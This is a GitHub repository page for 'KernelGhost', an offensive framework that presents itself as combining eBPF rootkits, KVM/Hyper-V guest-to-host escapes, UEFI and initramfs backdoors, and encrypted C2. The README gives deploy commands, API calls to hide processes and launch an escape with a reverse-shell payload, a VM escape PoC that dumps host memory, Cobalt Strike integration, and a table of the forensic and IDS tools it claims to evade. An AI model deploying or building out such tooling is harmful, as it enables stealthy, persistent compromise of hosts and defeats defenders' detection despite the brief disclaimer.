Skip to content
/ kernelghost Public

KernelGhost is a next-generation offensive security framework that combines stealthy eBPF-based rootkit capabilities with advanced hypervisor escape techniques. It enables persistent cross-VM access, stealth process hiding, UEFI firmware backdoors, and more all while evading modern detection systems.

License

MIT license
10 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Aviral2642/kernelghost

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
examples
examples
 
 
scripts
scripts
 
 
src
src
 
 
.DS_Store
.DS_Store
 
 
DEPLOYMENT.md
DEPLOYMENT.md
 
 
LICENSE
LICENSE
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 
TECHNICAL.md
TECHNICAL.md
 
 

Repository files navigation

🔥 KernelGhost: Hypervisor & eBPF Rootkit Framework

Next-generation offensive security framework combining eBPF stealth and hypervisor-level exploitation
"When userland isn't enough and the kernel isn't safe"

📌 Features

🕵️‍♂️ Core Capabilities

  • eBPF-Based Rootkit

    • Process/network hiding via syscall hooking
    • /proc//sys filesystem manipulation
    • Anti-forensic BPF verifier bypasses

  • Hypervisor Escapes

    • KVM/QEMU guest-to-host memory writes
    • Hyper-V VMBus ring buffer exploitation (CVE-2023-XXXX)
    • Nested virtualization attacks

  • Advanced Persistence

    • UEFI firmware implants via SPI flash
    • Initramfs backdoor injection
    • Cross-VM migration survival

🛡️ Defense Evasion

Technique Implementation Bypasses
Kernel Symbol Obfuscation __ksymtab modification Sysdig, ftrace
Memory Cloaking Nested Page Table manipulation LiME, Volatility
Cryptographic C2 AES-256-GCM over DNS-over-HTTPS Network IDS

🚀 Quick Start

🔧 Prerequisites

# Ubuntu 22.04+ (Linux kernel ≥5.15)
sudo apt install linux-headers-$(uname -r) clang-15 bpftool qemu-kvm

🛠️ Installation

git clone https://github.com/Aviral2642/kernelghost.git
cd kernelghost
make all -j$(nproc)
sudo make deploy

🧪 Basic Usage

from ghostctl import Ghost

# Hide process from detection
gh = Ghost()
gh.hide_pid(1337)

# Execute hypervisor escape
if gh.check_hypervisor() == "KVM":
    gh.escape_vm(payload="reverse_shell")

🧩 Examples

🔍 Process Ghosting

# Hide current shell process
./examples/process_ghosting $$

# Verify hiding (should show error)
ps -p $$

🧨 VM Escape PoC

# Launch attack on KVM host
./examples/vm_escape_poc --payload host_mem_dump.bin

🎯 Cobalt Strike Integration

python examples/cs_integration.py --listen 443 --aes-key $(openssl rand -hex 32)

📚 Documentation

Document Description
TECHNICAL.md Architecture, attack flows, internals
DEPLOYMENT.md Deployment checklist, OPSEC practices

🛠️ Development

🔧 Build Options

# Build with debug symbols
make DEBUG=1

# Cross-compile for ARM64
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu-

✅ Testing

# Run kernel module tests
make -C tests kunit

# eBPF verifier bypass tests
./tests/verify_bypass.sh

🌟 Roadmap

  • ✅ ARM64/M1 Silicon Support (Q4 2024)
  • ⏳ Windows Hyper-V Rootkit Module (Q1 2025)
  • 🚧 Quantum-Safe C2 Channels (PQ3/TLS1.3+)

⚠️ Disclaimer

This project is intended for:

  • ✅ Authorized red team engagements
  • ✅ Academic research on advanced persistence
  • ✅ Defensive countermeasure development

Never use this tool for unauthorized access. Developers assume no liability for misuse.

About

KernelGhost is a next-generation offensive security framework that combines stealthy eBPF-based rootkit capabilities with advanced hypervisor escape techniques. It enables persistent cross-VM access, stealth process hiding, UEFI firmware backdoors, and more all while evading modern detection systems.

Resources

Readme

License

MIT license
Activity

Stars

10 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages